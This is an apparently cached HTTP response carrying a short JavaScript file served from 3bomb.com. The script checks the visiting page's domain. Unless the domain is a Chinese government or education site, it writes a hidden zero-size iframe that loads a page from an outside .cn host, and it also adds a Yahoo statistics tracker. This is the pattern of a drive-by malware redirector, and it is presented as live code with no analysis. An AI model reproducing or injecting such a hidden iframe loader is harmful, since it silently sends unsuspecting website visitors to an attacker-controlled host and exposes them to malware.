HTTP/1.1 200 OK
Content-Length: 515
ETag: "90ebfb-203-aa627c40"
Date: Thu, 26 Feb 2009 06:04:11 GMT
Last-Modified: Thu, 26 Feb 2009 03:08:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Accept-Ranges: bytes
Content-Type: application/javascript
X-Polipo-Location: http://3bomb.com/c.js
X-Polipo-Date: Thu, 26 Feb 2009 06:14:45 GMT
X-Polipo-Access: Thu, 26 Feb 2009 06:14:45 GMT

var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http:\/\/w.d75d.cn\/01\/index.htm width=0 height=0><\/iframe>");
}
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/908507\/ystat.js\"><\/script>");